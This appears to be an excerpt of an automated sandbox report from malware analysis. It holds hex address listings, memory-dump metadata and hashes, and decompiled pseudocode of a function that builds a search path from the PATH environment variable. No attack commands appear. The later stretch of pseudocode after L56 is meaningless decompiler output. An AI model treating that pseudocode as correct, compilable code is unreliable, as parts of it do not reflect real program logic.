                                                        0x048fb36b
                                                        0x00000000
                                                        0x048fb36b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048ad6bf
                                                        0x048ad6bf
                                                        0x048ad6e5
                                                        0x048ad6e7
                                                        0x048ad6e9
                                                        0x048ad6e9
                                                        0x048ad6ec
                                                        0x048ad6ec
                                                        0x048ad6ef
                                                        0x048ad6f5
                                                        0x048ad6f9
                                                        0x048ad6fb
                                                        0x048ad6fd
                                                        0x048ad701
                                                        0x048ad703
                                                        0x048ad70a
                                                        0x048ad70a
                                                        0x048ad70a
                                                        0x048ad701
                                                        0x048ad70d
                                                        0x048ad710
                                                        0x048ad710
                                                        0x048ad6c1
                                                        0x048ad6c1
                                                        0x048ad6c1
                                                        0x048ad6c6
                                                        0x048fb36d
                                                        0x048fb36f
                                                        0x00000000
                                                        0x048fb375
                                                        0x048fb375
                                                        0x048fb375
                                                        0x00000000
                                                        0x048fb375
                                                        0x00000000
                                                        0x048ad6cc
                                                        0x048ad6d8
                                                        0x048ad6d8
                                                        0x048ad6d8
                                                        0x00000000
                                                        0x048ad6c6
                                                        0x048ad6bf
                                                        0x00000000
                                                        0x048ad6da
                                                        0x048ad6da
                                                        0x048ad716
                                                        0x048ad71b
                                                        0x048ad720
                                                        0x048ad726
                                                        0x048ad726
                                                        0x048ad72d
                                                        0x00000000
                                                        0x048ad733
                                                        0x048ad739
                                                        0x048ad742
                                                        0x048ad750
                                                        0x048ad758
                                                        0x048ad764
                                                        0x048ad776
                                                        0x048ad77a
                                                        0x048ad783
                                                        0x048ad928
                                                        0x048ad92c
                                                        0x048ad93d
                                                        0x048ad944
                                                        0x048ad94f
                                                        0x048ad954
                                                        0x048ad956
                                                        0x048ad95f
                                                        0x048ad961
                                                        0x048ad973
                                                        0x048ad973
                                                        0x048ad956
                                                        0x048ad944
                                                        0x048ad92c
                                                        0x048ad78b
                                                        0x048fb394
                                                        0x048ad791
                                                        0x048ad798
                                                        0x048fb3a3
                                                        0x048fb3bb
                                                        0x048fb3bb
                                                        0x048ad7a5
                                                        0x048ad866
                                                        0x048ad870
                                                        0x048ad884
                                                        0x048ad892
                                                        0x048ad898
                                                        0x048ad89e
                                                        0x048ad8a0
                                                        0x048ad8a6
                                                        0x048ad8ac
                                                        0x048ad8ae
                                                        0x048ad8b4
                                                        0x048ad8b4
                                                        0x048ad8ae
                                                        0x048ad7a5
                                                        0x048ad78b
                                                        0x048ad7b1
                                                        0x048fb3c5
                                                        0x048fb3c5
                                                        0x048ad7c3
                                                        0x048ad7ca
                                                        0x048ad7e5
                                                        0x048ad7eb
                                                        0x048ad8eb
                                                        0x048ad8ed
                                                        0x00000000
                                                        0x048ad8f3
                                                        0x048ad8f3
                                                        0x048ad8f3
                                                        0x00000000
                                                        0x048ad8ed
                                                        0x048ad7cc
                                                        0x048ad7cc
                                                        0x048ad7d2
                                                        0x00000000
                                                        0x048ad7d4
                                                        0x048ad7d4
                                                        0x048ad7d7
                                                        0x048ad7df
                                                        0x048fb3d4
                                                        0x048fb3d9
                                                        0x048fb3dc
                                                        0x048fb3dc
                                                        0x048fb3df
                                                        0x048fb3e2
                                                        0x048fb468
                                                        0x048fb46d
                                                        0x048fb46f
                                                        0x048fb46f
                                                        0x048fb475
                                                        0x048ad8f8
                                                        0x048ad8f9
                                                        0x048ad8fd
                                                        0x048fb3e8
                                                        0x048fb3e8
                                                        0x048fb3eb
                                                        0x048fb3ed
                                                        0x00000000
                                                        0x048fb3ef
                                                        0x048fb3ef
                                                        0x048fb3f1
                                                        0x048fb3f4
                                                        0x048fb3fe
                                                        0x048fb404
                                                        0x048fb409
                                                        0x048fb40e
                                                        0x048fb410
                                                        0x048fb410
                                                        0x048fb414
                                                        0x048fb414
                                                        0x048fb41b
                                                        0x048fb420
                                                        0x048fb423
                                                        0x048fb425
                                                        0x048fb427
                                                        0x048fb42a
                                                        0x048fb42d
                                                        0x048fb42d
                                                        0x048fb42a
                                                        0x048fb432
                                                        0x048fb436
                                                        0x048fb438
                                                        0x048fb43b
                                                        0x048fb43b
                                                        0x048fb449
                                                        0x048fb44e
                                                        0x048fb454
                                                        0x048fb458
                                                        0x048fb458
                                                        0x048fb45d
                                                        0x00000000
                                                        0x048fb45d
                                                        0x048fb3ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048ad7df
                                                        0x048ad7d2
                                                        0x048ad7ca
                                                        0x048fb37c
                                                        0x048fb37e
                                                        0x048fb385
                                                        0x048fb38a
                                                        0x00000000
                                                        0x048fb38a
                                                        0x048ad742
                                                        0x048ad7f1
                                                        0x048ad7f8
                                                        0x048fb49b
                                                        0x048fb49b
                                                        0x048ad800
                                                        0x048ad837
                                                        0x048ad843
                                                        0x048ad845
                                                        0x048ad847
                                                        0x048ad84a
                                                        0x048ad84b
                                                        0x048ad84e
                                                        0x048ad857
                                                        0x048ad802
                                                        0x048ad802
                                                        0x048ad80d
                                                        0x00000000
                                                        0x048ad818
                                                        0x048ad818
                                                        0x048ad824
                                                        0x048ad831
                                                        0x048fb4a5
                                                        0x048fb4ab
                                                        0x048fb4b3
                                                        0x048fb4b8
                                                        0x048fb4bb
                                                        0x00000000
                                                        0x048fb4c1
                                                        0x048fb4c1
                                                        0x048fb4c8
                                                        0x00000000
                                                        0x048fb4ce
                                                        0x048fb4d4
                                                        0x048fb4e1
                                                        0x048fb4e3
                                                        0x048fb4e5
                                                        0x00000000
                                                        0x048fb4eb
                                                        0x048fb4f0
                                                        0x048fb4f2
                                                        0x048adac9
                                                        0x048adacc
                                                        0x048adacf
                                                        0x048adad1
                                                        0x048add78
                                                        0x048add78
                                                        0x048adcf2
                                                        0x00000000
                                                        0x048adad7
                                                        0x048adad9
                                                        0x048adadb
                                                        0x00000000
                                                        0x00000000
                                                        0x048adae1
                                                        0x048adae1
                                                        0x048adae4
                                                        0x048adae6
                                                        0x048fb4f9
                                                        0x048fb4f9
                                                        0x048fb500
                                                        0x048adaec
                                                        0x048adaec
                                                        0x048adaf5
                                                        0x048adaf8
                                                        0x048adafb
                                                        0x048adb03
                                                        0x048adb11
                                                        0x048adb16
                                                        0x048adb19
                                                        0x048adb1b
                                                        0x048fb52c
                                                        0x048fb531
                                                        0x048fb534
                                                        0x048adb21
                                                        0x048adb21
                                                        0x048adb24
                                                        0x048adcd9
                                                        0x048adce2
                                                        0x048adce5
                                                        0x048add6a
                                                        0x048add6d
                                                        0x00000000
                                                        0x048add73
                                                        0x048fb51a
                                                        0x048fb51c
                                                        0x048fb51f
                                                        0x048fb524
                                                        0x00000000
                                                        0x048fb524
                                                        0x048adce7
                                                        0x048adce7
                                                        0x048adce7
                                                        0x00000000
                                                        0x048adce7
                                                        0x00000000
                                                        0x048adb2a
                                                        0x048adb2c
                                                        0x048adb31
                                                        0x048adb33
                                                        0x048adb36
                                                        0x048adb39
                                                        0x048adb3b
                                                        0x048adb66
                                                        0x048adb66
                                                        0x048adb3d
                                                        0x048adb3d
                                                        0x048adb3e
                                                        0x048adb46
                                                        0x048adb47
                                                        0x048adb49
                                                        0x048adb4c
                                                        0x048adb53
                                                        0x048adb55
                                                        0x048adb58
                                                        0x048adb5a
                                                        0x048fb50a
                                                        0x048fb50f
                                                        0x048fb512
                                                        0x048adb60
                                                        0x048adb60
                                                        0x048adb63
                                                        0x048adb63
                                                        0x00000000
                                                        0x048adb63
                                                        0x048adb5a
                                                        0x048adb3b
                                                        0x048adb24
                                                        0x048adb69
                                                        0x048adb69
                                                        0x048adb6c
                                                        0x048adb6f
                                                        0x048adb74
                                                        0x048fb557
                                                        0x048fb557
                                                        0x048fb55e
                                                        0x048adb7a
                                                        0x048adb7c
                                                        0x048adb7f
                                                        0x048adb82
                                                        0x048adb85
                                                        0x00000000
                                                        0x048adb8b
                                                        0x048adb8b
                                                        0x048adb8d
                                                        0x048adb9b
                                                        0x048adb9b
                                                        0x048adb9d
                                                        0x048adba0
                                                        0x048adba2
                                                        0x048adba4
                                                        0x048adba7
                                                        0x048adba9
                                                        0x048adbae
                                                        0x048adbae
                                                        0x048adbb1
                                                        0x048adbb4
                                                        0x048adbb4
                                                        0x048adbb7
                                                        0x048adbba
                                                        0x048adcd2
                                                        0x048adcd4
                                                        0x00000000
                                                        0x048adbc0
                                                        0x048adbc0
                                                        0x048adbd2
                                                        0x048adbd7
                                                        0x048adbda
                                                        0x048adbdd
                                                        0x048adbdf
                                                        0x00000000
                                                        0x048adbe5
                                                        0x048adbe5
                                                        0x048adbee
                                                        0x048adbf1
                                                        0x048fb541
                                                        0x048fb544
                                                        0x00000000
                                                        0x048fb546
                                                        0x048fb546
                                                        0x00000000
                                                        0x048fb546
                                                        0x048adbf7
                                                        0x048adbf7
                                                        0x048adbfd
                                                        0x048adbfd
                                                        0x048adbff
                                                        0x048adc0b
                                                        0x048adc15
                                                        0x048adc1b
                                                        0x048adc1d
                                                        0x048adc21
                                                        0x048adc21
                                                        0x048adc23
                                                        0x048adc23
                                                        0x048adc26
                                                        0x048adc29
                                                        0x048adc2b
                                                        0x00000000
                                                        0x00000000
                                                        0x048adc31
                                                        0x048adc34
                                                        0x048adc36
                                                        0x048adcbf
                                                        0x048adcbf
                                                        0x048adcc2
                                                        0x00000000
                                                        0x048adc3c
                                                        0x048adc41
                                                        0x048adc43
                                                        0x00000000
                                                        0x048adc45
                                                        0x048adc45
                                                        0x048adc47
                                                        0x00000000
                                                        0x048adc4d
                                                        0x048adc4d
                                                        0x048adc50
                                                        0x048adc52
                                                        0x048adc55
                                                        0x048adcfa
                                                        0x048adcfe
                                                        0x048add08
                                                        0x048add0a
                                                        0x048add0c
                                                        0x00000000
                                                        0x048add12
                                                        0x048add15
                                                        0x048add2d
                                                        0x048add2f
                                                        0x048add32
                                                        0x048add35
                                                        0x00000000
                                                        0x048add35
                                                        0x048adc5b
                                                        0x048adc5b
                                                        0x048adc5e
                                                        0x048adc61
                                                        0x048adc64
                                                        0x048adc67
                                                        0x048adc67
                                                        0x048adc6a
                                                        0x048adc6c
                                                        0x048adc8e
                                                        0x048adc8e
                                                        0x048adc91
                                                        0x048adc93
                                                        0x048adcce
                                                        0x048adcce
                                                        0x048adc95
                                                        0x048adc9c
                                                        0x048adc6e
                                                        0x048adc72
                                                        0x048adc75
                                                        0x048adc77
                                                        0x048adc79
                                                        0x048fb551
                                                        0x048fb551
                                                        0x00000000
                                                        0x048adc7f
                                                        0x048adc7f
                                                        0x048adc81
                                                        0x00000000
                                                        0x048adc83
                                                        0x048adc86
                                                        0x048adc88
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048adc88
                                                        0x048adc81
                                                        0x048adc79
                                                        0x048adc6c
                                                        0x048adc55
                                                        0x048adc47
                                                        0x048adc43
                                                        0x00000000
                                                        0x048adc36
                                                        0x048adc23
                                                        0x00000000
                                                        0x048adbff
                                                        0x048adbf1
                                                        0x048adbdf
                                                        0x048adb8f
                                                        0x048adb92
                                                        0x048adb95
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048adb95
                                                        0x048adb8d
                                                        0x048adb85
                                                        0x048adb74
                                                        0x048adc9f
                                                        0x048adca2
                                                        0x048adcb0
                                                        0x048adcb0
                                                        0x048adad1
                                                        0x048fb4e5
                                                        0x048fb4c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048ad831
                                                        0x048ad80d
                                                        0x00000000
                                                        0x048ad800
                                                        0x048fb47f
                                                        0x048fb485
                                                        0x00000000
                                                        0x048fb485
                                                        0x048ad665
                                                        0x048ad652
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x-&
                                                        • API String ID: 0-1468284904
                                                        • Opcode ID: 879eaaab500f56ee8b13e0501697df089b040b45ea8f1df75d1058c33da0fb76
                                                        • Instruction ID: a705a355e24e27331d61d0fce42c1fc3a4cd34daa21815878ce4619740c98cf2
                                                        • Opcode Fuzzy Hash: 879eaaab500f56ee8b13e0501697df089b040b45ea8f1df75d1058c33da0fb76
                                                        • Instruction Fuzzy Hash: D6E1B231A04259CFEB24DF18C944B69B7F2BF85308F084BA9DA09D7690D7B4BD91CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E048C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				signed int _t262;
				signed int _t264;
				intOrPtr _t266;
				signed int _t269;
				signed int _t276;
				signed int _t279;
				signed int _t287;
				intOrPtr _t293;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				void* _t299;
				signed int _t300;
				unsigned int _t303;
				signed int _t307;
				intOrPtr* _t308;
				void* _t309;
				signed int _t310;
				signed int _t314;
				intOrPtr _t326;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t350;
				void* _t351;
				void* _t353;

				_t347 = _t350;
				_t351 = _t350 - 0x4c;
				_v8 =  *0x498d360 ^ _t347;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t342 = 0x498b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t303 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t353 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t293 = 0x48;
				_t324 = 0 | _t353 == 0x00000000;
				_t335 = 0;
				_v37 = _t353 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t293 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t343 = 0xc0000106;
						goto L32;
					} else {
						_t342 = L048B4620(_t303,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t293);
						_v52 = _t342;
						__eflags = _t342;
						if(_t342 == 0) {
							_t343 = 0xc0000017;
							goto L32;
						} else {
							 *(_t342 + 0x44) =  *(_t342 + 0x44) & 0x00000000;
							_t50 = _t342 + 0x48; // 0x48
							_t337 = _t50;
							_t324 = _v32;
							 *((intOrPtr*)(_t342 + 0x3c)) = _t293;
							_t295 = 0;
							 *((short*)(_t342 + 0x30)) = _v48;
							__eflags = _t324;
							if(_t324 != 0) {
								 *(_t342 + 0x18) = _t337;
								__eflags = _t324 - 0x4988478;
								 *_t342 = ((0 | _t324 == 0x04988478) - 0x00000001 & 0xfffffffb) + 7;
								E048DF3E0(_t337,  *((intOrPtr*)(_t324 + 4)),  *_t324 & 0x0000ffff);
								_t324 = _v32;
								_t351 = _t351 + 0xc;
								_t295 = 1;
								__eflags = _a8;
								_t337 = _t337 + (( *_t324 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t287 = E049239F2(_t337);
									_t324 = _v32;
									_t337 = _t287;
								}
							}
							_t307 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t343 = _v68;
								__eflags = 0;
								 *((short*)(_t337 - 2)) = 0;
								goto L32;
							} else {
								_t297 = _t342 + _t295 * 4;
								_v56 = _t297;
								do {
									__eflags = _t324;
									if(_t324 != 0) {
										_t253 =  *(_v60 + _t307 * 4);
										__eflags = _t253;
										if(_t253 == 0) {
											goto L30;
										} else {
											__eflags = _t253 == 5;
											if(_t253 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t297 =  *(_v60 + _t307 * 4);
										 *(_t297 + 0x18) = _t337;
										_t257 =  *(_v60 + _t307 * 4);
										__eflags = _t257 - 8;
										if(_t257 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t257 * 4 +  &M048C2959))) {
												case 0:
													__ax =  *0x4988488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E048DF3E0(__edi,  *0x498848c, __ax & 0x0000ffff);
														__eax =  *0x4988488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E048DF3E0(_t337, _v80, _v64);
													_t282 = _v64;
													goto L26;
												case 2:
													 *0x4988480 & 0x0000ffff = E048DF3E0(__edi,  *0x4988484,  *0x4988480 & 0x0000ffff);
													__eax =  *0x4988480 & 0x0000ffff;
													__eax = ( *0x4988480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E048DF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E048DF3E0(_t337, _v76, _v36);
														_t282 = _v36;
													}
													L26:
													_t351 = _t351 + 0xc;
													_t337 = _t337 + (_t282 >> 1) * 2 + 2;
													__eflags = _t337;
													L27:
													_push(0x3b);
													_pop(_t284);
													 *((short*)(_t337 - 2)) = _t284;
													goto L28;
												case 6:
													__ebx =  *0x498575c;
													__eflags = __ebx - 0x498575c;
													if(__ebx != 0x498575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E048DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x498575c;
														} while (__ebx != 0x498575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4988478 & 0x0000ffff = E048DF3E0(__edi,  *0x498847c,  *0x4988478 & 0x0000ffff);
													__eax =  *0x4988478 & 0x0000ffff;
													__eax = ( *0x4988478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E049239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4986e58 & 0x0000ffff = E048DF3E0(__edi,  *0x4986e5c,  *0x4986e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4986e58 & 0x0000ffff;
													__eax = ( *0x4986e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t307 = _v16;
													_t324 = _v32;
													L29:
													_t297 = _t297 + 4;
													__eflags = _t297;
													_v56 = _t297;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t307 = _t307 + 1;
									_v16 = _t307;
									__eflags = _t307 - _v48;
								} while (_t307 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t257 =  *(_v60 + _t335 * 4);
						if(_t257 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t257 * 4 +  &M048C2935))) {
							case 0:
								__ax =  *0x4988488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t324 =  &_v64;
								_v80 = E048C2E3E(0,  &_v64);
								_t293 = _t293 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4988480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4988480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E048AEEF0(0x49879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E048AEB70(__ecx, 0x49879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t231 = _v72;
											__eflags = _t231;
											if(_t231 != 0) {
												L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t231);
											}
											_t232 = _v52;
											__eflags = _t232;
											if(_t232 != 0) {
												__eflags = _t343;
												if(_t343 < 0) {
													L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t232);
													_t232 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t303 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4987b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E048AEB70(__ecx, 0x49879a0);
										__eax = _v52;
										L36:
										_pop(_t336);
										_pop(_t344);
										__eflags = _v8 ^ _t347;
										_pop(_t294);
										return E048DB640(_t232, _t294, _v8 ^ _t347, _t324, _t336, _t344);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t289 = _v56;
								if(_v56 != 0) {
									_t324 =  &_v36;
									_t291 = E048C2E3E(_t289,  &_v36);
									_t303 = _v36;
									_v76 = _t291;
								}
								if(_t303 == 0) {
									goto L44;
								} else {
									_t293 = _t293 + 2 + _t303;
								}
								goto L14;
							case 6:
								__eax =  *0x4985764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4988478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4988478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4986e58 & 0x0000ffff;
								__eax = ( *0x4986e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t335 = _t335 + 1;
								if(_t335 >= _v48) {
									goto L16;
								} else {
									_t324 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t308 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t342 = es;
					 *((intOrPtr*)(_t351 + _t257 + 0x48c27e0)) =  *((intOrPtr*)(_t351 + _t257 + 0x48c27e0)) - _t308;
					 *[es:esi+eax*2] = es;
					 *((intOrPtr*)(_t351 + _t257 + 0x48c2605)) =  *((intOrPtr*)(_t351 + _t257 + 0x48c2605)) - _t308;
					_pop(ds);
					_pop(_t298);
					_t258 = _t257 + 0x94;
					 *((intOrPtr*)(_t351 + _t258 + 0x4905b35)) =  *((intOrPtr*)(_t351 + _t258 + 0x4905b35)) - _t308;
					_t309 = _t308 +  *_t308;
					 *((intOrPtr*)(_t258 + _t258 * 4)) = es;
					 *((intOrPtr*)(_t351 + _t258 + 0x48c27f6)) =  *((intOrPtr*)(_t351 + _t258 + 0x48c27f6)) - _t309;
					 *((intOrPtr*)(_t351 + _t258 + 0x48c284e)) =  *((intOrPtr*)(_t351 + _t258 + 0x48c284e)) - _t309;
					asm("daa");
					 *((intOrPtr*)(_t258 + _t298 * 8)) = es;
					_t299 = ds;
					 *((intOrPtr*)(_t351 + _t258 + 0x4905ce8)) =  *((intOrPtr*)(_t351 + _t258 + 0x4905ce8)) - _t309;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x496ff00);
					E048ED08C(_t299, _t337, _t342);
					_v44 =  *[fs:0x18];
					_t338 = 0;
					 *_a24 = 0;
					_t300 = _a12;
					__eflags = _t300;
					if(_t300 == 0) {
						_t262 = 0xc0000100;
					} else {
						_v8 = 0;
						_t345 = 0xc0000100;
						_v52 = 0xc0000100;
						_t264 = 4;
						while(1) {
							_v40 = _t264;
							__eflags = _t264;
							if(_t264 == 0) {
								break;
							}
							_t314 = _t264 * 0xc;
							_v48 = _t314;
							__eflags = _t300 -  *((intOrPtr*)(_t314 + 0x4871664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t279 = E048DE5C0(_a8,  *((intOrPtr*)(_t314 + 0x4871668)), _t300);
									_t351 = _t351 + 0xc;
									__eflags = _t279;
									if(__eflags == 0) {
										_t345 = E049151BE(_t300,  *((intOrPtr*)(_v48 + 0x487166c)), _a16, _t338, _t345, __eflags, _a20, _a24);
										_v52 = _t345;
										break;
									} else {
										_t264 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t264 = _t264 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t345;
						__eflags = _t345;
						if(_t345 < 0) {
							__eflags = _t345 - 0xc0000100;
							if(_t345 == 0xc0000100) {
								_t310 = _a4;
								__eflags = _t310;
								if(_t310 != 0) {
									_v36 = _t310;
									__eflags =  *_t310 - _t338;
									if( *_t310 == _t338) {
										_t345 = 0xc0000100;
										goto L76;
									} else {
										_t326 =  *((intOrPtr*)(_v44 + 0x30));
										_t266 =  *((intOrPtr*)(_t326 + 0x10));
										__eflags =  *((intOrPtr*)(_t266 + 0x48)) - _t310;
										if( *((intOrPtr*)(_t266 + 0x48)) == _t310) {
											__eflags =  *(_t326 + 0x1c);
											if( *(_t326 + 0x1c) == 0) {
												L106:
												_t345 = E048C2AE4( &_v36, _a8, _t300, _a16, _a20, _a24);
												_v32 = _t345;
												__eflags = _t345 - 0xc0000100;
												if(_t345 != 0xc0000100) {
													goto L69;
												} else {
													_t338 = 1;
													_t310 = _v36;
													goto L75;
												}
											} else {
												_t269 = E048A6600( *(_t326 + 0x1c));
												__eflags = _t269;
												if(_t269 != 0) {
													goto L106;
												} else {
													_t310 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t345 = E048C2C50(_t310, _a8, _t300, _a16, _a20, _a24, _t338);
											L76:
											_v32 = _t345;
											goto L69;
										}
									}
									goto L108;
								} else {
									E048AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t345 = _a24;
									_t276 = E048C2AE4( &_v36, _a8, _t300, _a16, _a20, _t345);
									_v32 = _t276;
									__eflags = _t276 - 0xc0000100;
									if(_t276 == 0xc0000100) {
										_v32 = E048C2C50(_v36, _a8, _t300, _a16, _a20, _t345, 1);
									}
									_v8 = _t338;
									E048C2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t262 = _t345;
					}
					L70:
					return E048ED0D1(_t262);
				}
				L108:
			}






















































                                                        0x048c2584
                                                        0x048c2586
                                                        0x048c2590
                                                        0x048c2596
                                                        0x048c2597
                                                        0x048c2598
                                                        0x048c2599
                                                        0x048c259e
                                                        0x048c25a4
                                                        0x048c25a9
                                                        0x048c25ac
                                                        0x048c25ae
                                                        0x048c25b1
                                                        0x048c25b2
                                                        0x048c25b5
                                                        0x048c25b8
                                                        0x048c25bb
                                                        0x048c25bc
                                                        0x048c25bf
                                                        0x048c25c2
                                                        0x048c25c5
                                                        0x048c25c6
                                                        0x048c25cb
                                                        0x048c25ce
                                                        0x048c25d8
                                                        0x048c25db
                                                        0x048c25dd
                                                        0x048c25de
                                                        0x048c25e1
                                                        0x048c25e3
                                                        0x048c25e9
                                                        0x048c26da
                                                        0x048c26da
                                                        0x048c26dd
                                                        0x048c26e2
                                                        0x04905b56
                                                        0x00000000
                                                        0x048c26e8
                                                        0x048c26f9
                                                        0x048c26fb
                                                        0x048c26fe
                                                        0x048c2700
                                                        0x04905b60
